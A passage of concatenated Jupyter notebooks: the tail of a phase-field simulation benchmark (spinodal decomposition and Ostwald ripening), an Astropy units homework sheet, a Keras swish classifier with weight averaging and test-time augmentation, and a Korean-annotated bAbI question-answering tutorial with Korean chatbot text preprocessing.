D \left( c \right) \nabla \left( \frac{ \partial f_0 }{ \partial c} - \kappa \nabla^2 c \right)
\right] $$
where $D$ is the diffusivity.
### Parameter Values
Use the following parameter values.
<table width="200">
<tr>
<td> $c_{\alpha}$ </td>
<td> 0.05 </td>
</tr>
<tr>
<td> $c_{\beta}$ </td>
<td> 0.95 </td>
</tr>
<tr>
<td> A </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa$ </td>
<td> 2.0 </td>
</tr>
</table>
with
$$ B = \frac{A}{\left( c_{\alpha} - c_m \right)^2} $$
$$ D = D_{\alpha} = D_{\beta} = \frac{2}{c_{\beta} - c_{\alpha}} $$
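As a quick sanity check, the derived parameters and the bulk free energy can be evaluated numerically; this is a plain NumPy sketch (not part of any reference solution), using the table values above:

```python
import numpy as np

# Table values for the spinodal decomposition problem
c_alpha, c_beta, A = 0.05, 0.95, 2.0

# Derived parameters from the formulas above
c_m = 0.5 * (c_alpha + c_beta)       # midpoint concentration, 0.5
B = A / (c_alpha - c_m) ** 2         # ~9.877
D = 2.0 / (c_beta - c_alpha)         # ~2.222

def f0(c):
    """Bulk free energy density f0(c) from the expression above."""
    return (-A / 2 * (c - c_m) ** 2 + B / 4 * (c - c_m) ** 4
            + c_alpha / 4 * (c - c_alpha) ** 4
            + c_beta / 4 * (c - c_beta) ** 4)

print(c_m, round(B, 3), round(D, 3))
```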
### Initial Conditions
Set $c\left(\vec{r}, 0\right)$ such that
$$ c\left(\vec{r}, 0\right) = \bar{c}_0 + \epsilon \cos \left( \vec{q} \cdot \vec{r} \right) $$
where
<table width="200">
<tr>
<td> $\bar{c}_0$ </td>
<td> 0.45 </td>
</tr>
<tr>
<td> $\vec{q}$ </td>
<td> $\left(\sqrt{2},\sqrt{3}\right)$ </td>
</tr>
<tr>
<td> $\epsilon$ </td>
<td> 0.01 </td>
</tr>
</table>
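A minimal NumPy sketch of this initial condition on a uniform grid (the grid resolution `nx` here is an arbitrary illustrative choice, not a prescribed discretization):

```python
import numpy as np

# Illustrative discretization of the Lx = Ly = 200 domain
L, nx = 200.0, 100
x = np.linspace(0.0, L, nx, endpoint=False)
X, Y = np.meshgrid(x, x, indexing="ij")

c0_bar, eps = 0.45, 0.01
qx, qy = np.sqrt(2.0), np.sqrt(3.0)

# c(r, 0) = c0_bar + eps * cos(q . r)
c = c0_bar + eps * np.cos(qx * X + qy * Y)

print(c.shape, round(float(c.min()), 3), round(float(c.max()), 3))
```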
### Domains
#### a. Square Periodic
2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.
```
from IPython.display import SVG
SVG(filename='../images/block1.svg')
```
#### b. No Flux
2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.
#### c. T-Shape No Flux
T-shaped region with zero-flux boundary conditions with $a=b=100$ and $c=d=20$.
```
from IPython.display import SVG
SVG(filename='../images/t-shape.svg')
```
#### d. Sphere
Domain is the surface of a sphere with radius 100, but with initial conditions of
$$ c\left(\theta, \phi, 0\right) = \bar{c}_0 + \epsilon \cos \left( \sqrt{233} \theta \right)
\sin \left( \sqrt{239} \phi \right) $$
where $\theta$ and $\phi$ are the polar and azimuthal angles in a spherical coordinate system. $\bar{c}_0$ and $\epsilon$ are given by the values in the table above.
### Tasks
Your task for each domain,
1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie
2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.
3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.
4. For domain a. above, demonstrate that the solution is robust with respect to meshing by refining the mesh (e.g. reduce the mesh size by about a factor of $\sqrt{2}$ in linear dimensions -- use whatever convenient way you have to refine the mesh without exploding the computational time).
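For task 2, the total free energy is the integral of the density $f$ over the domain. A hedged NumPy sketch using finite differences on a uniform grid (the discretization is an illustrative choice, not the reference method), evaluated on the initial condition above:

```python
import numpy as np

# Parameter values from the table above
c_alpha, c_beta, A, kappa = 0.05, 0.95, 2.0, 2.0
c_m = 0.5 * (c_alpha + c_beta)
B = A / (c_alpha - c_m) ** 2

def f0(c):
    # bulk free energy density from the formula above
    return (-A / 2 * (c - c_m) ** 2 + B / 4 * (c - c_m) ** 4
            + c_alpha / 4 * (c - c_alpha) ** 4
            + c_beta / 4 * (c - c_beta) ** 4)

def total_free_energy(c, dx):
    """F = sum over cells of [f0(c) + kappa/2 |grad c|^2] * dx^2."""
    gx, gy = np.gradient(c, dx)
    return np.sum(f0(c) + 0.5 * kappa * (gx ** 2 + gy ** 2)) * dx ** 2

# Evaluate on the initial condition of domain a.
L, nx = 200.0, 100
dx = L / nx
x = np.arange(nx) * dx
X, Y = np.meshgrid(x, x, indexing="ij")
c = 0.45 + 0.01 * np.cos(np.sqrt(2.0) * X + np.sqrt(3.0) * Y)
print(total_free_energy(c, dx))
```

Plotting this quantity after each time step gives the convergence curve asked for in task 2.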
## 2. Ostwald Ripening -- coupled Cahn-Hilliard and Allen-Cahn equations
This problem expands on the first: the phase field, described by the variables $\eta_i$, is now coupled to the concentration field $c$. The Ginzburg-Landau free energy density is now taken to be,
$$ f = f_0 \left[ C \left( \vec{r} \right), \eta_1, ... , \eta_p \right]
+ \frac{\kappa_C}{2} \left[ \nabla C \left( \vec{r} \right) \right]^2 +
\sum_{i=1}^p \frac{\kappa_i}{2} \left[ \nabla \eta_i \left( \vec{r} \right) \right]^2
$$
Here, $f_0$ is a bulk free energy density,
$$ f_0 \left[ C \left( \vec{r} \right), \eta_1, ... , \eta_p \right]
= f_1 \left( C \right) + \sum_{i=1}^p f_2 \left( C, \eta_i \right)
+ \sum_{i=1}^p \sum_{j\ne i}^p f_3 \left( \eta_j, \eta_i \right) $$
Here, $ f_1 \left( C \right) $ is the free energy density due to the concentration field, $C$, with local minima at $C_{\alpha}$ and $C_{\beta}$ corresponding to the solubilities in the matrix phase and the second phase, respectively; $f_2\left(C , \eta_i \right)$ is an interaction term between the concentration field and the phase fields, and $f_3 \left( \eta_i, \eta_j \right)$ is the free energy density of the phase fields. Simple models for these free energy densities are,
$$ f_1\left( C \right) =
- \frac{A}{2} \left(C - C_m\right)^2
+ \frac{B}{4} \left(C - C_m\right)^4
+ \frac{D_{\alpha}}{4} \left(C - C_{\alpha} \right)^4
+ \frac{D_{\beta}}{4} \left(C - C_{\beta} \right)^4 $$
where
$$ C_m = \frac{1}{2} \left(C_{\alpha} + C_{\beta} \right) $$
and
$$ f_2 \left( C, \eta_i \right) = - \frac{\gamma}{2} \left( C - C_{\alpha} \right)^2 \eta_i^2 + \frac{\beta}{2} \eta_i^4 $$
and
$$ f_3 \left( \eta_i, \eta_j \right) = \frac{ \epsilon_{ij} }{2} \eta_i^2 \eta_j^2, i \ne j $$
The time evolution of the system is now given by coupled Cahn-Hilliard and Allen-Cahn (time-dependent Ginzburg-Landau) equations for the conserved concentration field and the non-conserved phase fields:
$$
\begin{eqnarray}
\frac{\partial C}{\partial t} &=& \nabla \cdot \left \{
D \nabla \left[ \frac{\delta F}{\delta C} \right] \right \} \\
&=& D \left[ -A + 3 B \left( C- C_m \right)^2 + 3 D_{\alpha} \left( C - C_{\alpha} \right)^2 + 3 D_{\beta} \left( C - C_{\beta} \right)^2 \right] \nabla^2 C \\
& & -D \gamma \sum_{i=1}^{p} \left[ \eta_i^2 \nabla^2 C + 4 \nabla C \cdot \nabla \eta_i + 2 \left( C - C_{\alpha} \right) \nabla^2 \eta_i \right] - D \kappa_C \nabla^4 C
\end{eqnarray}
$$
and the phase field equations
$$
\begin{eqnarray}
\frac{\partial \eta_i}{\partial t} &=& - L_i \frac{\delta F}{\delta \eta_i} \\
&=& -L_i \left[ \frac{\partial f_2}{\partial \eta_i} + \frac{\partial f_3}{\partial \eta_i} - \kappa_i \nabla^2 \eta_i \left(\vec{r}, t\right) \right] \\
&=& L_i \gamma \left( C - C_{\alpha} \right)^2 \eta_i - L_i \beta \eta_i^3 - L_i \eta_i \sum_{j\ne i}^{p} \epsilon_{ij} \eta^2_j + L_i \kappa_i \nabla^2 \eta_i
\end{eqnarray}
$$
### Parameter Values
Use the following parameter values.
<table width="200">
<tr>
<td> $C_{\alpha}$ </td>
<td> 0.05 </td>
</tr>
<tr>
<td> $C_{\beta}$ </td>
<td> 0.95 </td>
</tr>
<tr>
<td> A </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa_i$ </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa_j$ </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\kappa_k$ </td>
<td> 2.0 </td>
</tr>
<tr>
<td> $\epsilon_{ij}$ </td>
<td> 3.0 </td>
</tr>
<tr>
<td> $\beta$ </td>
<td> 1.0 </td>
</tr>
<tr>
<td> $p$ </td>
<td> 10 </td>
</tr>
</table>
with
$$ B = \frac{A}{\left( C_{\alpha} - C_m \right)^2} $$
$$ \gamma = \frac{2}{\left(C_{\beta} - C_{\alpha}\right)^2} $$
$$ D = D_{\alpha} = D_{\beta} = \frac{\gamma}{\delta^2} $$
The diffusion coefficient, $D$, is constant and isotropic and the same (unity) for both phases; the mobility-related constants, $L_i$, are the same (unity) for all phase fields.
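Numerically (a quick sketch; $\delta$ is not specified above, so only $B$ and $\gamma$ are evaluated):

```python
# Table values for the Ostwald ripening problem
C_alpha, C_beta, A = 0.05, 0.95, 2.0

C_m = 0.5 * (C_alpha + C_beta)          # 0.5
B = A / (C_alpha - C_m) ** 2            # ~9.877, as in problem 1
gamma = 2.0 / (C_beta - C_alpha) ** 2   # ~2.469

print(round(B, 3), round(gamma, 3))
```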
### Initial Conditions
Set $c\left(\vec{r}, 0\right)$ and $\eta_i\left(\vec{r}, 0\right)$ such that
$$
\begin{eqnarray}
c\left(\vec{r}, 0\right) &=& \bar{c}_0 + \epsilon \cos \left( \vec{q} \cdot \vec{r} \right) \\
\eta_i\left(\vec{r}, 0\right) &=& \bar{\eta}_0 + 0.01 \epsilon_i \cos^2 \left( \vec{q}_i \cdot \vec{r} \right)
\end{eqnarray}
$$
where
<table width="200">
<tr>
<td> $\bar{c}_0$ </td>
<td> 0.5 </td>
</tr>
<tr>
<td> $\vec{q}$ </td>
<td> $\left(\sqrt{2},\sqrt{3}\right)$ </td>
</tr>
<tr>
<td> $\epsilon$ </td>
<td> 0.01 </td>
</tr>
<tr>
<td> $\vec{q}_i$ </td>
<td> $\left( \sqrt{23 + i}, \sqrt{149 + i} \right)$ </td>
</tr>
<tr>
<td> $\epsilon_i$ </td>
<td> 0.979285, 0.219812, 0.837709, 0.695603, 0.225115,
0.389266, 0.585953, 0.614471, 0.918038, 0.518569 </td>
</tr>
<tr>
<td> $\bar{\eta}_0$ </td>
<td> 0.0 </td>
</tr>
</table>
### Domains
#### a. Square Periodic
2D square domain with $L_x = L_y = 200$ and periodic boundary conditions.
```
from IPython.display import SVG
SVG(filename='../images/block1.svg')
```
#### b. No Flux
2D square domain with $L_x = L_y = 200$ and zero flux boundary conditions.
#### c. T-Shape No Flux
T-shaped region with zero-flux boundary conditions with $a=b=100$ and $c=d=20$.
```
from IPython.display import SVG
SVG(filename='../images/t-shape.svg')
```
#### d. Sphere
Domain is the surface of a sphere with radius 100, but with initial conditions of
$$ c\left(\theta, \phi, 0\right) = \bar{c}_0 + \epsilon \cos \left( \sqrt{233} \theta \right)
\sin \left( \sqrt{239} \phi \right) $$
and
$$ \eta_i\left(\theta, \phi, 0\right) = \bar{\eta}_0 + 0.01 \epsilon_i \cos^2 \left( \sqrt{23 + i} \theta \right)
\sin^2 \left( \sqrt{149 + i} \phi \right) $$
where $\theta$ and $\phi$ are the polar and azimuthal angles in a spherical coordinate system and parameter values are in the table above.
### Tasks
Your task for each domain,
1. Calculate the time evolution of the concentration -- store concentration at time steps to make a movie
2. Plot the free energy as a function of time steps until you judge that convergence or a local equilibrium has been reached.
3. Present wall clock time for the calculations, and wall clock time per core used in the calculation.
|
github_jupyter
|
# First Last - Homework 4
* Use the `Astropy` units and constants packages to solve the following problems.
* Do not hardcode any constants!
* Unless asked, your units should be in the simplest SI units possible
```
import numpy as np
from astropy import units as u
from astropy import constants as const
from astropy.units import imperial
imperial.enable()
```
### Impulse is a change in momentum
$$ I = \Delta\ p\ =\ m\Delta v $$
**Problem 1** - Calculate the $\Delta$v that would be the result of an impulse of 700 (N * s) for M = 338 kg.
**Problem 2** - Calculate the $\Delta$v that would be the result of an impulse of 700 (lbf * s) for M = 338 kg.
This is the unit conversion error that doomed the [Mars Climate Orbiter](https://en.wikipedia.org/wiki/Mars_Climate_Orbiter)
### The range of a projectile launched with a velocity (v) at an angle ($\theta$) is
$$R\ =\ {v^2 \over g}\ sin(2\theta)$$
**Problem 3** - Find R for v = 123 mph and $\theta$ = 1000 arc minutes
**Problem 4** - How fast do you have to throw a football at 33.3 degrees so that it goes exactly 100 yards? Express your answer in mph
### Kepler's third law can be expressed as:
$$ T^2 = \left( {{4\pi^2} \over {GM}} \right)\ r^3 $$
Where **T** is the orbital period of an object at distance (**r**) around a central object of mass (**M**).
It assumes the mass of the orbiting object is small compared to the mass of the central object.
**Problem 5** - Calculate the orbital period of HST. HST orbits 353 miles above the **surface** of the Earth. Express your answer in minutes.
**Problem 6** - An exoplanet orbits the star Epsilon Tauri in 595 days at a distance of 1.93 AU. Calculate the mass of Epsilon Tauri in terms of solar masses.
### The velocity of an object in orbit is
$$ v=\sqrt{GM\over r} $$
Where the object is at a distance (**r**) around a central object of mass (**M**).
**Problem 7** - Calculate the velocity of HST. Express your answer in km/s and mph.
**Problem 8** - The Proclaimers' song [500 miles](https://youtu.be/MJuyn0WAYNI?t=27s) has a duration of 3 minutes and 33 seconds. Calculate at what altitude, above the Earth's surface, you would have to orbit to go 1000 miles in this time. Express your answer in km and miles.
### The Power being received by a solar panel in space can be expressed as:
$$ I\ =\ {{L_{\odot}} \over {4 \pi d^2}}\ \varepsilon$$
Where **I** is the power **per unit area** at a distance (**d**) from the Sun, and $\varepsilon$ is the efficiency of the solar panel.
The solar panels that power spacecraft have an efficiency of about 40%.
**Problem 9** - The [New Horizons](http://pluto.jhuapl.edu/) spacecraft requires 220 Watts of power.
Calculate the area of a solar panel that would be needed to power New Horizons at a distance of 1 AU from the Sun.
**Problem 10** - Express your answer in units of the area of a piece of US letter sized paper (8.5 in x 11 in).
**Problem 11** - Same question as above but now at d = 30 AU.
Express your answer in both square meters and US letter sized paper.
**Problem 12** - The main part of the Oort cloud is thought to be at a distance of about 10,000 AU.
Calculate the size of the solar panel New Horizons would need to operate in the Oort cloud.
Express your answer in units of the area of an American football field (120 yd x 53.3 yd).
**Problem 13** - Calculate the maximum distance from the Sun at which a solar panel of 1 football field can power the New Horizons spacecraft. Express your answer in AU.
### Due Tue Jan 31 - 5pm
- `Make sure to change the filename to your name!`
- `Make sure to change the Title to your name!`
- `File -> Download as -> HTML (.html)`
- `upload your .html and .ipynb file to the class Canvas page`
|
github_jupyter
|
# Swish-based classifier with data augmentation and stochastic weight averaging
- Swish activation, 4 layers, 100 neurons per layer
- Data is augmented via phi rotations and transverse and longitudinal flips
- Model uses a running average of previous weights
- Validation score uses an ensemble of 10 models weighted by loss
### Import modules
```
%matplotlib inline
from __future__ import division
import sys
import os
sys.path.append('../')
from Modules.Basics import *
from Modules.Class_Basics import *
```
## Options
```
with open(dirLoc + 'features.pkl', 'rb') as fin:
    classTrainFeatures = pickle.load(fin)
nSplits = 10
patience = 50
maxEpochs = 200
ensembleSize = 10
ensembleMode = 'loss'
compileArgs = {'loss':'binary_crossentropy', 'optimizer':'adam'}
trainParams = {'epochs' : 1, 'batch_size' : 256, 'verbose' : 0}
modelParams = {'version':'modelSwish', 'nIn':len(classTrainFeatures), 'compileArgs':compileArgs, 'mode':'classifier'}
print ("\nTraining on", len(classTrainFeatures), "features:", [var for var in classTrainFeatures])
```
## Import data
```
with open(dirLoc + 'inputPipe.pkl', 'rb') as fin:
    inputPipe = pickle.load(fin)
trainData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'train.hdf5', "r+"),
inputPipe=inputPipe, augRotMult=16)
```
## Determine LR
```
lrFinder = batchLRFind(trainData, getModel, modelParams, trainParams,
lrBounds=[1e-5,1e-1], trainOnWeights=True, verbose=0)
```
## Train classifier
```
results, histories = batchTrainClassifier(trainData, nSplits, getModel,
{**modelParams, 'compileArgs':{**compileArgs, 'lr':2e-3}},
trainParams, trainOnWeights=True, maxEpochs=maxEpochs,
swaStart=125, swaRenewal=-1,
patience=patience, verbose=1, amsSize=250000)
```
Once SWA is activated at epoch 125, the validation loss goes through a rapid decrease followed by a plateau, with the statistical fluctuations strongly suppressed.
Compared to 5_Model_Data_Augmentation the metrics are mostly the same, except for the AMS, which moves from 3.98 to 4.04.
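The running-average idea behind SWA can be sketched in a few lines of NumPy (a stand-in illustration, not the `Modules` implementation used above; `swa_start` and the fake training step are assumptions):

```python
import numpy as np

rng = np.random.default_rng(0)
w = np.zeros(4)          # current model weights (toy stand-in)
swa_w, n_avg = None, 0
swa_start = 5            # epoch at which averaging begins
history = []

for epoch in range(10):
    w = w + rng.normal(scale=0.1, size=w.shape)  # stand-in for one epoch of SGD
    history.append(w.copy())
    if epoch >= swa_start:
        # running average of the end-of-epoch weights seen since swa_start
        swa_w = w.copy() if swa_w is None else (swa_w * n_avg + w) / (n_avg + 1)
        n_avg += 1

print(swa_w)
```

At inference time the averaged weights `swa_w` replace the final weights `w`, which is what smooths the validation-loss curve seen above.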
## Construct ensemble
```
with open('train_weights/resultsFile.pkl', 'rb') as fin:
    results = pickle.load(fin)
ensemble, weights = assembleEnsemble(results, ensembleSize, ensembleMode, compileArgs)
```
## Response on validation data with TTA
```
valData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'val.hdf5', "r+"), inputPipe=inputPipe,
rotate = True, reflect = True, augRotMult=8)
batchEnsemblePredict(ensemble, weights, valData, ensembleSize=ensembleSize, verbose=1)
print('Testing ROC AUC: unweighted {}, weighted {}'.format(roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source)),
roc_auc_score(getFeature('targets', valData.source), getFeature('pred', valData.source), sample_weight=getFeature('weights', valData.source))))
amsScanSlow(convertToDF(valData.source))
%%time
bootstrapMeanAMS(convertToDF(valData.source), N=512)
```
In the validation metrics we also find an improvement over 5_Model_Data_Augmentation: the overall AMS moves from 3.97 to 3.99, and the AMS corresponding to the mean cut increases from 3.91 to 3.97.
# Test scoring
```
testData = RotationReflectionBatch(classTrainFeatures, h5py.File(dirLoc + 'testing.hdf5', "r+"), inputPipe=inputPipe,
rotate = True, reflect = True, augRotMult=8)
%%time
batchEnsemblePredict(ensemble, weights, testData, ensembleSize=ensembleSize, verbose=1)
scoreTestOD(testData.source, 0.9606163307325915)
```
Unfortunately, applying the cut to the test data shows an improvement in the public score (3.65->3.68) but a large decrease in the private score (3.82->3.79).
# Save/Load
```
name = "weights/Swish_SWA-125"
saveEnsemble(name, ensemble, weights, compileArgs, overwrite=1)
ensemble, weights, compileArgs, _, _ = loadEnsemble(name)
```
|
github_jupyter
|
# Toy code for exploratory experiments (Facebook bAbI Question-Answer)
<p>
# +++++++++++++++++++++++++++++++++++++++++++++
# What are the limits and weaknesses of the toy code? How can they be addressed?
<p>
# Exploring the shortage of English and Korean data by trying a Korean-English translator
<p>
## +++++++++++++++++++++++++++++++++++++++++++++++++++
<p>
## Use the toy code to find its weaknesses, adjust the data (in the good sense of tuning it),
## observe how the data is transformed and how the weight matrices and the accuracy change,
## and explore by narrating the flow from the input, through the intermediate forms, to the final output!
# =========== Basic questions for the exploration project =========
# How can AI and mathematics education be combined and developed together?
# Translate the English data into Korean training data and augment it.
# Can we build a Korean question-answer math learning system?
# Above all, first learn how to process the data,
# then explore the deep learning algorithm and attention applied to that data.
# ==========================================
# The bAbI tasks (look up the bAbI tasks and data on the web)
# See page 130 of the textbook
## bAbI data on GitHub: https://github.com/andri27-ts/bAbI
<p>
# Tasks worth attempting as a math-education exploration project
# QA6 - Yes/No Questions
# QA7 - Counting
### bAbI data: https://github.com/harvardnlp/MemN2N/tree/master/babi_data/en
<p>
# The data is saved under settings ==> .keras ==> dataset
https://appliedmachinelearning.blog/2019/05/01/developing-factoid-question-answering-system-on-babi-facebook-data-set-python-keras-part-1/
# Feature Extraction
Let us first write a helper function to vectorize each story so that it can be fed to the memory network model we will create later.
https://appliedmachinelearning.blog/2019/05/02/building-end-to-end-memory-network-for-question-answering-system-on-babi-facebook-data-set-python-keras-part-2/
# ===================================
# Training a neural network model on the bAbI data
<p>
# === NLP: building a bAbI QA chatbot ===
<p>
# The original bAbI QA6 data is in data_in
## ./data_in/babi_qa6_train.txt
## ./data_in/babi_qa6_test.txt
<p>
# =================================
<p>
# The toy code uses the following data files.
## ./data_in/babi_train_qa.txt
## ./data_in/babi_test_qa.txt
## What is the difference between the toy-code data and the original data??
## +++++++++++++++++++++++++++++++++
<p>
# ========= Exploring the toy bAbI QA ===========
```
#Library Imports
import pickle
import numpy as np
import pandas as pd
```
# Pickle data files and CSV data files
## Study the pandas and numpy material on page 80 of the textbook.
```
#retrieve training data
# IOPub data rate exceeded.
# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000
unpickled_df = pd.read_pickle('./data_in/babi_train_qa.txt')
# print( unpickled_df )  # it is a list
df = pd.DataFrame( unpickled_df )
# df = pd.DataFrame(some_list, columns=["column"])
df.to_csv('./data_in/babi_train_qa.csv', index=False)
print( df[0:5] )
df.shape # number of training examples: 10,000
#retrieve training data
# IOPub data rate exceeded.
# jupyter notebook --NotebookApp.iopub_data_rate_limit=10000000000
unpickled_df = pd.read_pickle('./data_in/babi_test_qa.txt')
# print( unpickled_df )  # it is a list
df = pd.DataFrame( unpickled_df )
# df = pd.DataFrame(some_list, columns=["column"])
df.to_csv('./data_in/babi_test_qa.csv', index=False)
print( df[0][0] )
print( df[1][0] )
print( df[2][0] )
print( df[0][4] )
print( df[1][4] )
print( df[2][4] )
print( df[0][5] )
print( df[1][5] )
print( df[2][5] )
print( df.shape ) # ===> number of test examples: 1000
```
# [Question] Compare with the QA6 text files below
## ./data_in/babi_qa6_train.txt
## ./data_in/babi_qa6_test.txt
```
with open('./data_in/babi_train_qa.txt', 'rb') as f:
    train_data = pickle.load(f)
print( train_data[10] )
train_data[0][0:3]
#retrieve test data
with open('./data_in/babi_test_qa.txt', 'rb') as f:
    test_data = pickle.load(f)
#Number of training instances
len(train_data)
#Number of test instances
len(test_data)
#Example of one of the instances
train_data[10]
' '.join(train_data[10][0])
' '.join(train_data[10][1])
train_data[10][2]
```
# ++++++++++++++++++++++++++++++++++++
<p>
# [Exercise] Handling Korean chatbot data
<p>
# ++++++++++++++++++++++++++++++++++++
<p>
# [Exercise 1] Handling the data_nmt/conversation2.txt data
```
import pandas as pd
file = open( "./data_nmt/conversation2.txt", "r" , encoding="utf-8")
data = file.readlines()
df1 = []
for ii in data:
    df1.append(ii[:-1])
df2 = pd.DataFrame( df1 )
df2.to_csv( './data_nmt/conversation2.csv' , index=False, encoding='utf-8')
datacsv = pd.read_csv( './data_nmt/conversation2.csv' , encoding='utf-8')
datacsv
print( datacsv[0:5] )
from konlpy.tag import Okt  # okt is used in the loop below, so define it first
okt = Okt()
result_data=list( )
input_data = list( datacsv['0'][0:5] )
######################################
for seq in input_data :
    print( seq )
    result = " ".join( okt.morphs(seq.replace(' ', '')))
    result_data.append( result )
print( result_data )
datas = []
datas.extend( result_data )
datas
import re
FILTERS = "([~.,!?\"':;)(])"
CHANGE_FILTER = re.compile(FILTERS)
vocabwords = []
for sentence in datas:
    # FILTERS = "([~.,!?\"':;)(])"
    # Anything matching the filter above is replaced
    # with "" using the regular expression.
    sentence = re.sub(CHANGE_FILTER, "", sentence)
    for word in sentence.split():
        vocabwords.append(word)
print( vocabwords )
import re
DATA_PATH="./data_nmt/conversation2.txt"
############## Chatbot data ############
def Tokenizer( sentence ):
    token=[]
    for word in sentence.strip().split():
        token.extend(re.compile("([.,!?\"':;)(])").split(word))
    ret=[t for t in token if t]
    return ret
wordsk=[]
datask=[]
with open( DATA_PATH , 'r' , encoding='utf-8' ) as f:
    lines=f.read()
    datask.append(lines)
    wordsk=Tokenizer( lines )
wordsk=list( set( wordsk ) )
# list <=== datas.shape
print( wordsk[0:10] )
datask[0][0:100]
from konlpy.tag import Okt
okt = Okt()
wordsz=[]
datasz=[]
with open( DATA_PATH , 'r', encoding='utf-8') as content_file :
    for con in content_file:
        content = content_file.read()
        datasz.append( content )
        wordsz.extend( okt.morphs(content) )
wordsz = list(set(wordsz))
print( wordsz[0:10] )
datasz[0][0:100]
```
# ++++++++++++++++++++++++++++++++++++
<p>
# [Exercise 2] Handling the data_in/ChatBotData.csv data
```
import pandas as pd
data = pd.read_csv( './data_in/ChatBotData.csv' , encoding='utf-8')
print( data.head() )
questions, answers = list( data['Q'] ) , list( data['A'] )
from konlpy.tag import Okt # Twitter
from tqdm import tqdm
morph_analyzer = Okt() # Twitter()
# Create a list to receive the morpheme-tokenized
# sentences.
result_data = list()
# Loop over every sentence in the data
# so that each one can be tokenized.
# Twitter.morphs (here Okt.morphs) returns the tokenized
# list, which is then rejoined into a single string
# with spaces between tokens.
for seq in tqdm( questions + answers ):
    morphlized_seq = " ".join(morph_analyzer.morphs(seq.replace(' ', '')))
    result_data.append(morphlized_seq)
questions = result_data
import re
FILTERS = "([~.,!?\"':;)(])"
CHANGE_FILTER = re.compile(FILTERS)
vocabwords = []
for sentence in result_data:  # 'datas' was undefined in this cell; iterate the tokenized sentences
    # FILTERS = "([~.,!?\"':;)(])"
    # Anything matching the filter above is replaced
    # with "" using the regular expression.
    sentence = re.sub(CHANGE_FILTER, "", sentence)
    for word in sentence.split():
        vocabwords.append(word)
print( len(vocabwords) )
vocab = set( vocabwords )
print( len(vocab) )
vocfile = './data_out/vocabularyData.txt'
with open(vocfile , 'w' , encoding='utf-8') as wf:
    for w in vocab:
        wf.write(w+"\n")
print("A new vocabulary file has been created!!")
```
# ++++++++++++++++++++++++++++++++++++
<p>
# [Question] Understand the process of building a Korean vocabulary!!
# ++++++++++++++++++++++++++++++++++++
<p>
# Represent sentences as vectors using the chatbot vocabulary!!
<p>
# ++++++++++++++++++++++++++++++++++++
## Compare with the material on page 30 of the textbook
```
set1=[1,2,3,4,5, 1,2,3,9]
set2=[2,3,5,6,7, 2,3,4,8]
set1 = set(set1)
moim = set()
moim = moim.union( set1)
moim = moim.intersection( set(set2))
print( moim )
```
# The ./data_in/babi_train_qa.txt data
```
import pickle
with open('./data_in/babi_train_qa.txt', 'rb') as f:
    train_data = pickle.load(f)
print( train_data[10] )
train_data[0][0:3]
#First we will build a set of all the words in the dataset:
vocab = set()
for story, question, answer in train_data:
    vocab = vocab.union(set(story)) #Set returns unique words in the sentence
    #Union returns the unique elements from two sets
    vocab = vocab.union(set(question))
vocab.add('no')
vocab.add('yes')
for x in vocab :
    if( x.startswith('b')) :
        print( x )
#Calculate len and add 1 for Keras placeholder - Placeholders are used to feed in the data to the network.
#They need a data type, and have optional shape arguements.
#They will be empty at first, and then the data will get fed into the placeholder
vocab_len = len(vocab) + 1
vocab_len
#retrieve test data
with open('./data_in/babi_test_qa.txt', 'rb') as f:
    test_data = pickle.load(f)
#Now we are going to calculate the longest story and the longest question
#We need this for the Keras pad sequences.
#Keras training layers expect all of the input to have the same length, so
#we need to pad
all_data = test_data + train_data
all_story_lens = [len(data[0]) for data in all_data]
max_story_len = (max(all_story_lens))
max_question_len = max([len(data[1]) for data in all_data])
```
# Now let's turn the bAbI sentences into vectors
First, we will go through a manual process of how to vectorize the data, and then we will create a function that does this automatically for us.
```
import keras
print( keras.__version__ )
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
#Create an instance of the tokenizer object:
tokenizer = Tokenizer(filters = [])
tokenizer.fit_on_texts(vocab)
#Dictionary that maps every word in our vocab to an index
# It has been automatically lowercased
#This tokenizer can give different indexes for different words depending on when we run it
tokenizer.word_index
#Tokenize the stories, questions and answers:
train_story_text = []
train_question_text = []
train_answers = []
#Separating each of the elements
for story,question,answer in train_data:
    train_story_text.append(story)
    train_question_text.append(question)
    train_answers.append(answer)
#Coverting the text into the indexes
train_story_seq = tokenizer.texts_to_sequences(train_story_text)
#Create a function for vectorizing the stories, questions and answers:
def vectorize_stories(data,word_index = tokenizer.word_index, max_story_len = max_story_len, max_question_len = max_question_len):
    #vectorized stories:
    X = []
    #vectorized questions:
    Xq = []
    #vectorized answers:
    Y = []
    for story, question, answer in data:
        #Getting indexes for each word in the story
        x = [word_index[word.lower()] for word in story]
        #Getting indexes for each word in the question
        xq = [word_index[word.lower()] for word in question]
        #For the answers
        y = np.zeros(len(word_index) + 1) #Index 0 Reserved when padding the sequences
        y[word_index[answer]] = 1
        X.append(x)
        Xq.append(xq)
        Y.append(y)
    #Now we have to pad these sequences:
    return(pad_sequences(X,maxlen=max_story_len), pad_sequences(Xq, maxlen=max_question_len), np.array(Y))
inputs_train, questions_train, answers_train = vectorize_stories(train_data)
inputs_test, questions_test, answers_test = vectorize_stories(test_data)
inputs_train[3]
# train_story_text[3]
train_story_text[0]
# train_story_seq[3]
train_story_seq[0]
train_answers[3]
answers_train[3]
```
# See the input-output mapping on page 36 of the textbook
# A model (a neural network) that maps vectors to vectors
```
#Imports
from keras.models import Sequential, Model
from keras.layers.embeddings import Embedding
from keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate, LSTM
# We need to create the placeholders
#The Input function is used to create a keras tensor
#PLACEHOLDER shape = (max_story_len,batch_size)
#These are our placeholders for the inputs, ready to receive batches of the stories and the questions
input_sequence = Input((max_story_len,)) #As we don't know the batch size yet
question = Input((max_question_len,))
print( input_sequence )
print( question )
```
# encoder + decoder
## See page 129 of the textbook

